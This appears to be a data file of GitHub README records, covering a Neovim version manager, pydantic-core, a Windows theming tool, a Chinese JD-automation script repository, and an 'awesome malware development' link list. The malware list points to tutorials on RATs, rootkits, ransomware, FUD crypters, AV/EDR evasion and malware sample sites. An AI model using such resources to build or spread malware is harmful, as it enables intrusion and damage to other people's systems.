"installation_location": "/home/user/.local/share/bob/nvim-bin", // The path in which the used neovim version will be located in
"version_sync_file_location": "/home/user/.config/nvim/nvim.version", // The path to a file that will hold the neovim version string, useful for config version tracking, bob will error if the specified file is not a valid file path
"rollback_limit": 3, // The amount of rollbacks before bob starts to delete older ones, can be up to 225
"github_mirror": "https://github.com" // github or github mirror
}
```
## 💻 Shell Completion
- Bash
Completion files are commonly stored in `/etc/bash_completion.d/` for system-wide commands, but can be stored in `~/.local/share/bash-completion/completions` for user-specific commands. Run the command:
```bash
mkdir -p ~/.local/share/bash-completion/completions
bob complete bash >> ~/.local/share/bash-completion/completions/bob
```
This installs the completion script. You may have to log out and log back in to your shell session for the changes to take effect.
- Bash (macOS/Homebrew)
Homebrew stores bash completion files within the Homebrew directory. With the `bash-completion` brew formula installed, run the command:
```bash
mkdir -p $(brew --prefix)/etc/bash_completion.d
bob complete bash > $(brew --prefix)/etc/bash_completion.d/bob.bash-completion
```
- Fish
Fish completion files are commonly stored in `$HOME/.config/fish/completions`. Run the command:
```fish
mkdir -p ~/.config/fish/completions
bob complete fish > ~/.config/fish/completions/bob.fish
```
This installs the completion script. You may have to log out and log back in to your shell session for the changes to take effect.
- Zsh
Zsh completions are commonly stored in any directory listed in your `$fpath` variable. To use these completions, you must either add the generated script to one of those directories, or add your own to this list.
Adding a custom directory is often the safest bet if you are unsure of which directory to use. First create the directory; for this example we'll create a hidden directory inside our `$HOME` directory:
```zsh
mkdir ~/.zfunc
```
Then add the following lines to your `.zshrc` just before `compinit`:
```zsh
fpath+=~/.zfunc
```
Now you can install the completions script using the following command:
```zsh
bob complete zsh > ~/.zfunc/_bob
```
You must then either log out and log back in, or simply run
```zsh
exec zsh
```
for the new completions to take effect.
- PowerShell
The PowerShell completion scripts require PowerShell v5.0+ (which comes with Windows 10, but can be downloaded separately for windows 7 or 8.1).
First, check if a profile has already been set
```powershell
Test-Path $profile
```
If the above command returns `False` run the following
```powershell
New-Item -path $profile -type file -force
```
Now open the file provided by `$profile` (if you used the `New-Item` command it will be `${env:USERPROFILE}\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1`
Next, we either save the completions file into our profile, or into a separate file and source it inside our profile. To save the completions into our profile simply use
```powershell
bob complete powershell >> ${env:USERPROFILE}\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
```
## 🛠️ Troubleshooting
`sudo: nvim: command not found`
This error can be caused when `secure_path` is enabled in `/etc/sudoers` like in distros such as Fedora Workstation 37, possible workarounds:
1. disable `secure_path`
2. run `sudo env "PATH=$PATH" nvim`
3. set `$SUDO_USER` to location of bob nvim binary: `SUDO_EDITOR='/home/user/.local/share/bob/nvim-bin/nvim`
These workarounds were devised by @nfejzic, thanks to him.
## :heart: Credits And Inspiration
- [nvm](https://github.com/nvm-sh/nvm) A node version manager
- [nvenv](https://github.com/NTBBloodbath/nvenv) A Neovim version manager written by NTBBloodbath
| A version manager for neovim | neovim,neovim-version-manager,version-manager,rust,tool,command-line,hacktoberfest | 31 | 24 | 114 | 667 | 7 | 8 | 2 |
rootkit-io/awesome-malware-development | # Introduction
This Repo serves as a list of resources for malware development.
Note: I am just a learner what i have im sharing some reources can be stupid, you can help me adding things.
# Essentials
I would say having some experience with C and assembly going to be good.
some resources for C and assmebly.
- [C for Everyone: Programming Fundamentals](https://www.coursera.org/learn/c-for-everyone)
- [learn-c](https://www.learn-c.org/)
- [C cheatsheet](https://learnxinyminutes.com/docs/c/)
- [Architecture 1001: x86-64 Assembly](https://p.ost2.fyi/courses/course-v1:OpenSecurityTraining2+Arch1001_x86-64_Asm+2021_v1/about)
- [x86 Assembly](https://opensecuritytraining.info/IntroX86.html)
# Blogs
[Vitali Kremez blog](https://www.vkremez.com/)
> Lot's of Malware related content.
[0xPat blog](https://0xpat.github.io/)
> Have an amazing malware development series i would recommend to take a look.
[zerosum0x0 blog](https://zerosum0x0.blogspot.com/)
> Some good posts.
[Guitmz blog](https://www.guitmz.com/)
> Dope Maldev Content.
[TheXcellerator](https://xcellerator.github.io/)
> Amazing LKM rookit series and maldev posts.
---
# Talks
[Horse Pill: A New Type of Linux Rootkit](https://www.youtube.com/watch?v=wyRRbow4-bc)\
[Not a talk but good LKM rootkit series](https://www.youtube.com/playlist?list=PLrdeBRwgL0TrjHL0iHqRJD8Pz9t9FECHy)\
[Good talk on Creating and Countering the Next Generation of Linux Rootkits](https://www.youtube.com/watch?v=g6SKWT7sROQ)\
[Kernel Mode Threats and Practical Defenses](https://www.youtube.com/watch?v=BBJgKuXzfwc)\
[Alex Ionescu - Advancing the State of UEFI Bootkits](https://www.youtube.com/watch?v=dpG97TBR3Ys)\
[BlueHat v18 || Return of the kernel rootkit malware (on windows 10)](https://youtu.be/qVIxFfXpyNc)
---
# Youtube channels
[AGDC Services](https://m.youtube.com/channel/UCnpn999NpDMMPxZXW8sgZLA)
> HQ Malware Content.
[TheSphinx](https://www.youtube.com/c/TheSphinx/)
> Have an amazing series on Writing your Rat from Scratch.
[Joey Abrams](https://www.youtube.com/channel/UCIjKM-9G9r2Og2E080Wfbvw)
> Amazing Malware stuff, have a good code injection series, Linux stuff.
[w3w3w3](https://www.youtube.com/c/w3w3w3)
> Have a good LKM rootkit series.
# Courses
There are some courses I would love to recommend.
[RED TEAM Operator: Malware Development Essentials course | Sektor7](https://www.sektor7.net/institute/RTO-MalDev)
>This course will teach you how to become a better ethical hacker, pentester and red teamer by learning malware development. It covers developing droppers, trojans and payload/DLL injectors using some basic C and Intel assembly skills.
[RED TEAM Operator: Malware Development Intermediate course](https://www.sektor7.net/institute/RTO-MalDev2)
> Advanced malware development techniques in Windows, including: API hooking, 32-/64-bit migrations, reflective binaries and more.
[RingZerø: Windows Kernel Rootkits: Techniques and Analysis](https://ringzer0.training/2019/windows-kernel-rootkits.html)
> Key Learnings:
- Machine architecture for kernel programmers
- Virtual memory management
- Interrupts and exceptions
- CPU security features
- Windows kernel architecture
- Kernel components (Ps, Io, Mm, Ob, Se, Cm, etc.)
- System mechanisms
- Debugging with WinDbg
- Rootkit techniques
- Driver development
[CodeMachine: Windows Kernel Rootkits](https://www.codemachine.com/trainings/kerrkt.html)
> Topics:
- Kernel Attacks
- Kernel Shellcoding
- Kernel Hooking and Injection
- Kernel Callbacks
- Kernel Filtering
- Kernel Networking
- Virtualization Based Security
---
# Books
- The Art of Computer Virus Research and Defense
- The Giant Black Book of Computer Viruses
- Designing BSD Rootkits: An Introduction to Kernel Hacking
- Rootkits and Bootkits
- The Antivirus Hackers' Handbook
## Free books
[Make your own first fud crypter](https://www.docdroid.net/GrvkCtu/make-your-fud-crypter-pdf)
---
# Articles/posts
[Malware Development – Welcome to the Dark Side: Part 1](https://niiconsulting.com/checkmate/2018/02/malware-development-welcome-dark-side-part-1/)\
[Art of Malware](https://danusminimus.github.io/2020/03/04/The-Art-of-Malware.html)\
[Malware Development Part 1](https://0xpat.github.io/Malware_development_part_1/)\
[Basic Ransomware guide](https://0x00sec.org/t/basic-ransomware-guide/28345)\
[Understanding TRITON and the Missing Final Stage of the Attack good read.](https://threatpost.com/understanding-triton-and-the-missing-final-stage-of-the-attack/134895/)\
[Master of RATs - How to create your own Tracker](https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848)\
[Amazing article to read with some good resources (Personal Tale and the Road to Malware Development, Resources)](https://0x00sec.org/t/personal-tale-and-the-road-to-malware-development-resources/20369)\
[PT_NOTE -> PT_LOAD x64 ELF virus written in Assembly](https://www.guitmz.com/linux-midrashim-elf-virus/)\
[The magic of LD_PRELOAD for Userland Rootkits(good read if you wanna get into rootkits this blog is for userland rootkits)](https://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/)\
[(Recommended Read) if you want to creat your first userland rootkit and you just know C you can go for this blog if you wanna start into rootkit development](https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/#)\
[Function Hooking Part I: Hooking Shared Library Function Calls in Linux](https://www.netspi.com/blog/technical/network-penetration-testing/function-hooking-part-i-hooking-shared-library-function-calls-in-linux/)\
[Inline Hooking for Programmers (Part 1: Introduction)](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-1.html)\
[Inline Hooking for Programmers (Part 2: Writing a Hooking Engine)](https://www.malwaretech.com/2015/01/inline-hooking-for-programmers-part-2.html)\
[PE injection for beginners](https://www.malwaretech.com/2013/11/portable-executable-injection-for.html)\
[Becoming-rat-your-system](https://devilinside.me/blogs/becoming-rat-your-system)\
[Complete guide on LKM hacking](http://www.ouah.org/LKM_HACKING.html)\
[Best series i will say if you wanna get into programming/malware dev recommended series to follow it will start with learn programming thats needed asm and stuff after that getting into maldev](https://0x00sec.org/t/programming-for-wannabes-part-i/1143)\
[Filess malware](https://0x00sec.org/t/fileless-malware/26973)\
[Examining the Morris Worm Source Code](https://0x00sec.org/t/examining-the-morris-worm-source-code-malware-series-0x02/685)\
[IOT Malware](https://0x00sec.org/t/iot-malware-droppers-mirai-and-hajime/1966)\
[DoublePulsar SMB backdoor analysis](https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html)\
[Eset Turla Outlook backdoor report](https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf)\
[Writing a custom encoder](https://smarinovic.github.io/posts/Custom-Encoder/)\
[Engineering antivirus evasion](https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/)\
[Analysis of Project Sauron APT](https://securelist.com/faq-the-projectsauron-apt/75533/)\
[WastedLocker analysis](https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/)\
[Lazarus shellcode execution](https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method)\
[Detailed analysis of Zloader](https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf)\
[BendyBear shellcode malware](https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/)\
[A Basic Windows DKOM Rootkit](https://blog.landhb.dev/posts/v9eRa/a-basic-windows-dkom-rootkit-pt-1/)\
[Loading Kernel Shellcode](https://www.fireeye.com/blog/threat-research/2018/04/loading-kernel-shellcode.html)\
[Windows Kernel Shellcode on Windows 10 – Part 1](https://improsec.com/tech-blog/windows-kernel-shellcode-on-windows-10-part-1)\
[Windows Kernel Shellcode on Windows 10 – Part 2](https://improsec.com/tech-blog/windows-kernel-shellcode-on-windows-10-part-2)\
[Windows Kernel Shellcode on Windows 10 – Part 3](https://improsec.com/tech-blog/windows-kernel-shellcode-on-windows-10-part-3)\
[Introduction to Shellcode Development](https://owasp.org/www-pdf-archive/Introduction_to_shellcode_development.pdf)\
[Autochk Rootkit Analysis](https://repnz.github.io/posts/autochk-rootkit-analysis/)\
[pierogi backdoor](https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor?utm_content=116986912&utm_medium=social&utm_source=twitter&hss_channel=tw-835463838)\
[Pay2Kitten](https://samples.vx-underground.org/APTs/2020/2020.12.17(1)/Paper/Pay2Kitten.pdf)\
[STEELCORGI](https://samples.vx-underground.org/APTs/2021/2021.01.12(2)/Paper/STEEL%20CORGI.pdf)\
[Lebanese Cedar APT](https://samples.vx-underground.org/APTs/2021/2021.01.28/Paper/Lebanese%20Cedar%20APT.pdf)\
[LazyScripter](https://samples.vx-underground.org/APTs/2021/2021.02.24(1)/Paper/LazyScripter.pdf)\
[Maze deobfuscation](https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/)\
[Darkside overview](https://unit42.paloaltonetworks.com/darkside-ransomware/)\
[SunBurst backdoor - FireEye analysis](https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html)\
[Code obfuscation techniques](https://chris124567.github.io/2021-06-23-survey-obfuscation/)\
[SideCopy APT tooling](https://talosintelligence.com/resources/257)\
[Hiding in PEB sight: Custom loader](https://blog.christophetd.fr/hiding-windows-api-imports-with-a-customer-loader/)\
[Zloader: New infection technique](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/)\
[FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines](https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/)\
[A tale of EDR bypass methods](https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/)\
[In-depth dive into the security features of the Intel/Windows platform secure boot process](https://igor-blue.github.io/2021/02/04/secure-boot.html)\
[Process Injection Techniques](https://www.cynet.com/attack-techniques-hands-on/process-injection-techniques/)\
[Adventures with KernelCallbackTable Injection](https://captmeelo.com/redteam/maldev/2022/04/21/kernelcallbacktable-injection.html)\
[Useful Libraries for Malware Development](https://captmeelo.com//redteam/maldev/2022/02/16/libraries-for-maldev.html)\
[Parent Process ID (PPID) Spoofing](https://captmeelo.com/redteam/maldev/2021/11/22/picky-ppid-spoofing.html)\
[Mutants Sessions Self Deletion](https://github.com/Octoberfest7/Mutants_Sessions_Self-Deletion)\
[OffensiVe Security with V - Process Hollowing](https://alexfrancow.github.io/app-development/OffensiVe-Security-with-V-Hollowing/)\
[Looking for Remote Code Execution bugs in the Linux kernel](https://xairy.io/articles/syzkaller-external-network)\
[memory-analysis-evasion](https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)\
[100% evasion - Write a crypter in any language to bypass AV](https://netsec.expert/posts/write-a-crypter-in-any-language/)
---
# Forums
- https://0x00sec.org/
> One of the best Malware Development fourms that helped me a lot.
---
# Sample Sharing
- [Underground](https://vx-underground.org/samples.html)
- [MalShare](https://www.malshare.com/)
- [Malware Bazaar](https://bazaar.abuse.ch/browse/)
---
# Some interesting Github Repos(miscellaneous)
[TL-TROJAN](https://github.com/threatland/TL-TROJAN)
> A collection of source code for various RATs, Stealers, and other Trojans.
[Linker_preloading_virus](https://github.com/elfmaster/linker_preloading_virus)
> An example of hijacking the dynamic linker with a custom interpreter who loads and executes modular viruses.
[Awesome-linux-rootkits](https://github.com/tkmru/awesome-linux-rootkits)
> A summary of linux rootkits published on GitHub.
[Virii](https://github.com/guitmz/virii)
> Collection of ancient computer virus source codes.
[Flare-floss](https://github.com/mandiant/flare-floss)
> FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware.
[Ebpfkit](https://github.com/Gui774ume/ebpfkit)
> Ebpfkit is a rootkit powered by eBPF.
[Al-Khaser](https://github.com/LordNoteworthy/al-khaser#al-khaser-v081)
> Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.
[Evasions](https://github.com/CheckPointSW/Evasions)
> Evasions encyclopedia gathers methods used by malware to evade detection when run in virtualized environment.
[loonix_syscall_hook](https://github.com/null0333/loonix_syscall_hook)
> System call hooking on arm64 linux via a variety of methods.
[awesome-executable-packing](https://github.com/dhondta/awesome-executable-packing)
> A curated list of awesome resources related to executable packing.
| Organized list of my malware development resources | malware,malware-development,malware-research | 0 | 1 | 0 | 20 | 2 | 1 | 0 |
pydantic/pydantic-core | # pydantic-core
[![CI](https://github.com/pydantic/pydantic-core/workflows/ci/badge.svg?event=push)](https://github.com/pydantic/pydantic-core/actions?query=event%3Apush+branch%3Amain+workflow%3Aci)
[![Coverage](https://codecov.io/gh/pydantic/pydantic-core/branch/main/graph/badge.svg)](https://codecov.io/gh/pydantic/pydantic-core)
[![pypi](https://img.shields.io/pypi/v/pydantic-core.svg)](https://pypi.python.org/pypi/pydantic-core)
[![versions](https://img.shields.io/pypi/pyversions/pydantic-core.svg)](https://github.com/pydantic/pydantic-core)
[![license](https://img.shields.io/github/license/pydantic/pydantic-core.svg)](https://github.com/pydantic/pydantic-core/blob/main/LICENSE)
This package provides the core functionality for [pydantic](https://docs.pydantic.dev) validation and serialization.
Pydantic-core is currently around 17x faster than pydantic V1.
See [`tests/benchmarks/`](./tests/benchmarks/) for details.
## Example of direct usage
_NOTE: You should not need to use pydantic-core directly; instead, use pydantic, which in turn uses pydantic-core._
```py
from pydantic_core import SchemaValidator, ValidationError
v = SchemaValidator(
{
'type': 'typed-dict',
'fields': {
'name': {
'type': 'typed-dict-field',
'schema': {
'type': 'str',
},
},
'age': {
'type': 'typed-dict-field',
'schema': {
'type': 'int',
'ge': 18,
},
},
'is_developer': {
'type': 'typed-dict-field',
'schema': {
'type': 'default',
'schema': {'type': 'bool'},
'default': True,
},
},
},
}
)
r1 = v.validate_python({'name': 'Samuel', 'age': 35})
assert r1 == {'name': 'Samuel', 'age': 35, 'is_developer': True}
# pydantic-core can also validate JSON directly
r2 = v.validate_json('{"name": "Samuel", "age": 35}')
assert r1 == r2
try:
v.validate_python({'name': 'Samuel', 'age': 11})
except ValidationError as e:
print(e)
"""
1 validation error for model
age
Input should be greater than or equal to 18
[type=greater_than_equal, context={ge: 18}, input_value=11, input_type=int]
"""
```
## Getting Started
You'll need rust stable [installed](https://rustup.rs/), or rust nightly if you want to generate accurate coverage.
With rust and python 3.8+ installed, compiling pydantic-core should be possible with roughly the following:
```bash
# clone this repo or your fork
git clone git@github.com:pydantic/pydantic-core.git
cd pydantic-core
# create a new virtual env
python3 -m venv env
source env/bin/activate
# install dependencies and install pydantic-core
make install
```
That should be it, the example shown above should now run.
You might find it useful to look at [`python/pydantic_core/_pydantic_core.pyi`](./python/pydantic_core/_pydantic_core.pyi) and
[`python/pydantic_core/core_schema.py`](./python/pydantic_core/core_schema.py) for more information on the python API,
beyond that, [`tests/`](./tests) provide a large number of examples of usage.
If you want to contribute to pydantic-core, you'll want to use some other make commands:
* `make build-dev` to build the package during development
* `make build-prod` to perform an optimised build for benchmarking
* `make test` to run the tests
* `make testcov` to run the tests and generate a coverage report
* `make lint` to run the linter
* `make format` to format python and rust code
* `make` to run `format build-dev lint test`
## Profiling
It's possible to profile the code using the [`flamegraph` utility from `flamegraph-rs`](https://github.com/flamegraph-rs/flamegraph). (Tested on Linux.) You can install this with `cargo install flamegraph`.
Run `make build-profiling` to install a release build with debugging symbols included (needed for profiling).
Once that is built, you can profile pytest benchmarks with (e.g.):
```bash
flamegraph -- pytest tests/benchmarks/test_micro_benchmarks.py -k test_list_of_ints_core_py --benchmark-enable
```
The `flamegraph` command will produce an interactive SVG at `flamegraph.svg`.
## Releasing
1. Bump package version locally. Do not just edit `Cargo.toml` on Github, you need both `Cargo.toml` and `Cargo.lock` to be updated.
2. Make a PR for the version bump and merge it.
3. Go to https://github.com/pydantic/pydantic-core/releases and click "Draft a new release"
4. In the "Choose a tag" dropdown enter the new tag `v<the.new.version>` and select "Create new tag on publish" when the option appears.
5. Enter the release title in the form "v<the.new.version> <YYYY-MM-DD>"
6. Click Generate release notes button
7. Click Publish release
8. Go to https://github.com/pydantic/pydantic-core/actions and ensure that all build for release are done successfully.
9. Go to https://pypi.org/project/pydantic-core/ and ensure that the latest release is published.
10. Done 🎉
| Core validation logic for pydantic written in rust | json-schema,parsing,pydantic,rust,schema,validation | 105 | 77 | 1,066 | 1,126 | 63 | 104 | 2 |
shufflewzc/faker3 | ## 仓库说明
### 不破楼兰终不还
Faker自用仓库。本地秘钥计算方法,保证账户信息安全。已适配Spy插件24小时全天监控。
* 推荐配合spy使用
* 自有拉库代理
* 每日保持更新
### 注意
由于现在青龙版本更新迭代快,但青龙插件适配速度慢,为了可以完美使用本库,请使用一键安装脚本安装2.11.3版青龙。
【一键脚本】
https://thin-hill-428.notion.site/Faker-QL-pannel-Faker-Repository-environment-Setup-45edcbfe90d74d8abb2d71896eab3be7
## 纯净版
无任何自带助力码。
#### [点击直达频道获得更多使用教程](https://t.me/scriptalking)
[![Anurag's GitHub stats](https://github-readme-stats.vercel.app/api?username=shufflewzc&bg_color=30,e96443,904e95&title_color=fff&text_color=fff)](https://github.com/anuraghazra/github-readme-stats)
【注意】拉库前请打开青龙面板-配置文件 第18行 GithubProxyUrl="" 双引号中的内容去掉。
Faker3 纯净版
ql repo https://git.metauniverse-cn.com/https://github.com/shufflewzc/faker3.git "jd_|jx_|gua_|jddj_|jdCookie" "activity|backUp" "^jd[^_]|USER|function|utils|sendNotify|ZooFaker_Necklace.js|JDJRValidator_|sign_graphics_validate|ql|JDSignValidator|magic|depend|h5sts" "main"
【教程合集】
[https://www.notion.so/Cent-OS-7-6-1c598629675145988b43a37998a1604a]()
## Special statement:
* Any unlocking and decryption analysis scripts involved in the Script project released by this warehouse are only used for testing, learning and research, and are forbidden to be used for commercial purposes. Their legality, accuracy, completeness and effectiveness cannot be guaranteed. Please make your own judgment based on the situation. .
* All resource files in this project are forbidden to be reproduced or published in any form by any official account or self-media.
* This warehouse is not responsible for any script problems, including but not limited to any loss or damage caused by any script errors.
* Any user who indirectly uses the script, including but not limited to establishing a VPS or disseminating it when certain actions violate national/regional laws or related regulations, this warehouse is not responsible for any privacy leakage or other consequences caused by this.
* Do not use any content of the Script project for commercial or illegal purposes, otherwise you will be responsible for the consequences.
* If any unit or individual believes that the script of the project may be suspected of infringing on their rights, they should promptly notify and provide proof of identity and ownership. We will delete the relevant script after receiving the certification document.
* Anyone who views this item in any way or directly or indirectly uses any script of the Script item should read this statement carefully. This warehouse reserves the right to change or supplement this disclaimer at any time. Once you have used and copied any relevant scripts or rules of the Script project, you are deemed to have accepted this disclaimer.
**You must completely delete the above content from your computer or mobile phone within 24 hours after downloading.** </br>
> ***You have used or copied any script made by yourself in this warehouse, it is deemed to have accepted this statement, please read it carefully***
## Special thanks to:
* [@NobyDa](https://github.com/NobyDa)
* [@chavyleung](https://github.com/chavyleung)
* [@liuxiaoyucc](https://github.com/liuxiaoyucc)
* [@Zero-S1](https://github.com/Zero-S1)
* [@uniqueque](https://github.com/uniqueque)
* [@nzw9314](https://github.com/nzw9314)
* [@Andy Woo](https://t.me/update_help_group)「青龙互助研究院支持」
* [@Oreo](https://github.com/Oreomeow) 「青龙Faker仓库一键安装配置」
# 欢迎Pull Request!
| null | null | 0 | 3 | 16 | 510 | 2 | 1 | 0 |
Abdelrhman-AK/WinPaletter | ## 🛑 Announcement: Project Development Discontinuation:
Dear WinPaletter Users,
It is with a heavy heart that I announce the discontinuation of further development on the WinPaletter project. While there's an extremely slim possibility that I may find time in the distant future, perhaps years from now, to resume maintenance, I must inform you that version `1.0.9.3` marks the end of active development. Subsequent versions (`1.0.9.x`) has extremely weak possibility to be developed.
In the coming days or weeks, I will proceed to archive this repository. However, please note that the existing version will remain accessible for continued use, albeit without updates or maintenance.
You can certainly contribute to the WinPaletter Store for themes; this repository won't be archived. [Open the Wiki](https://github.com/Abdelrhman-AK/WinPaletter/wiki) and navigate to the WinPaletter Store section in the side panel.
I want to express my deepest gratitude for your support and for choosing WinPaletter. Your enthusiasm and feedback have been invaluable throughout this journey. It has been an immense honor for me to contribute to a project that aimed to enhance your user experience. If WinPaletter has caused any inconvenience or disruption to your Windows setup, I sincerely apologize.
---
# WinPaletter
# ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/GithubBannerIntro.jpg?raw=true)
![Github All Releases](https://img.shields.io/github/downloads/Abdelrhman-AK/WinPaletter/total?color=0078D4&style=for-the-badge) ![GitHub Release](https://img.shields.io/github/v/release/Abdelrhman-AK/WinPaletter?color=05227A&style=for-the-badge) [![GitHub stars](https://img.shields.io/github/stars/Abdelrhman-AK/WinPaletter?color=F4870A&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/stargazers) [![GitHub issues](https://img.shields.io/github/issues/Abdelrhman-AK/WinPaletter?color=FF0000&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/issues) [![GitHub forks](https://img.shields.io/github/forks/Abdelrhman-AK/WinPaletter?color=00AF00&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/network) [![GitHub license](https://img.shields.io/github/license/Abdelrhman-AK/WinPaletter?color=FF0C4F&style=for-the-badge)](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/License.md)
#### WinPaletter is a portable tool designed to elevate your Windows desktop experience. Whether you're a designer, developer, or someone who loves personalization, WinPaletter offers an intuitive interface and robust features to streamline the management and application of colors and effects on your Windows system.
#### With WinPaletter, you can customize a wide range of Windows aspects, including Windows Colors, Visual Styles, Classic Colors, Lock screen (LogonUI), Cursors, Metrics and Fonts, Terminals and Consoles, wallpaper, sounds, screen savers, Windows effects (tweaks), and Windows icons according to your preferences.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Features.png?raw=true) Key Features
- **Intuitive Interface:** WinPaletter boasts a user-friendly interface, making color palette management accessible to users of all levels of expertise.
- **Themes Import/Export:** Explore a world of creativity with the ability to import and export themes. Visit the WinPaletter Store to discover a diverse collection of themes shared by the community.
- **Real-time Preview:** Witness your color choices come to life with the real-time preview feature, allowing you to fine-tune your color scheme effortlessly.
![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Preview.png?raw=true)
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/GettingStarted.png?raw=true) Getting Started
1. **Requirements:**
| Windows | WinPaletter ... and higher | Frameworks |
| ------------------ | ------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **11, 10** | `Any version` | You might need to [update .NET framework](https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48) in outdated Windows 10 or build less than 1709 |
| **8.1, 7** | `1.0.5.0` | [.NET Framework 4.7.2, or 4.8](https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48) |
| **8** | `Not supported` :x: | Not supported as .NET framework 4.7.2 or 4.8 can't be installed at all |
| **Vista** | `1.0.7.1` | .NET Framework 4.8 Repacked. Read [Windows Vista's documentation](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Getting-Windows-XP-and-Vista-ready-to-make-them-can-launch-WinPaletter#2-windows-vista) |
| **XP** | `1.0.7.1` | OneCoreAPI + .NET Framework 4.8 Repacked. You must read its [documentation](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Getting-Windows-XP-and-Vista-ready-to-make-them-can-launch-WinPaletter) |
2. **Download:**
- You can download the latest release from the [releases page](https://github.com/Abdelrhman-AK/WinPaletter/releases).
> **Note:** It is the first source to be updated.
- Alternatively, you can use:
- Microsoft WinGet:
`winget install Abdelrhman-AK.WinPaletter -l "UnzipPath"`
- Chocolatey:
`choco install WinPaletter` or `choco install WinPaletter --version x.x.xx`
- [Visit this](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Get-WinPaletter) for advanced instructions.
3. **Launch:** Once downloaded, launch WinPaletter and start exploring its features to enhance your desktop aesthetics.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Help.png?raw=true) Wiki (Help)
[Click here](https://github.com/Abdelrhman-AK/WinPaletter/wiki) to learn more about WinPaletter.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Help.png?raw=true) Changelog
[Click here](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/CHANGELOG.md) to view all changes that have been made to WinPaletter since its initial release.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/PayPal.png?raw=true) Support me
[PayPal](https://www.paypal.me/AbdelrhmanAK)
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Languages.png?raw=true) Languages
[Click here](https://github.com/Abdelrhman-AK/WinPaletter/tree/master/Languages) to get languages for WinPaletter.
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Antivirus.png?raw=true) Do you have an antivirus or browser issue?
[Click here to read instructions](https://github.com/Abdelrhman-AK/WinPaletter/wiki/Antiviruses-or-browsers-download-issue).
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/Credits.png?raw=true) Credits
WinPaletter is developed and maintained by [Abdelrhman-AK](https://github.com/Abdelrhman-AK) and the incredible open-source community:
- Modifying Modern Windows Elements Inspired by u/aveyo and u/Egg-Tricky on Reddit: [Link 1](https://www.reddit.com/r/Windows11/comments/sw15u0/dark_theme_did_you_notice_the_ugly_pale_accent), [Link 2](https://www.reddit.com/r/Windows11/comments/tkvet4/pitch_black_themereg_now_for_ctrlaltdel_as_well)
- [Patching UxTheme.dll to apply unsigned Visual Styles by SecureUxTheme, developed by namazso](https://github.com/namazso/SecureUxTheme)
- [3D and flat degrees modification in 3D objects (Classic Colors) is inspired by Desktop Architect](https://en.wikipedia.org/wiki/Desktop_Architect)
- [Colors picking controls by Cyotek](https://github.com/cyotek/Cyotek.Windows.Forms.ColorPicker)
- [Image to palette conversion mechanism by ColorThief, developed by KSemenenko](https://github.com/KSemenenko/ColorThief)
- [Bitmap effects powered by ImageProcessor](https://imageprocessor.org)
- [Bitmaps to cursors conversion mechanism developed by Evan Olds](https://github.com/evanolds/AnimCur)
- [Retrieving elements of Windows XP visual styles (*.msstyles) using the Advanced UxTheme wrapper](https://www.codeproject.com/Articles/18603/Advanced-UxTheme-wrapper)
- [Extracting elements from visual styles (*.msstyles) using nptr/msstyleEditor](https://github.com/nptr/msstyleEditor)
- [Patching PE files by Ressy, developed by Tyrrrz](https://github.com/Tyrrrz/Ressy)
- [Handling JSON files using Newtonsoft JSON by James Newton-King](https://github.com/JamesNK/Newtonsoft.Json)
- [Processing and handling command lines arguments by CommandLineParser](https://github.com/commandlineparser/commandline)
- [Icons designed by Pichon](https://icons8.com/app/windows)
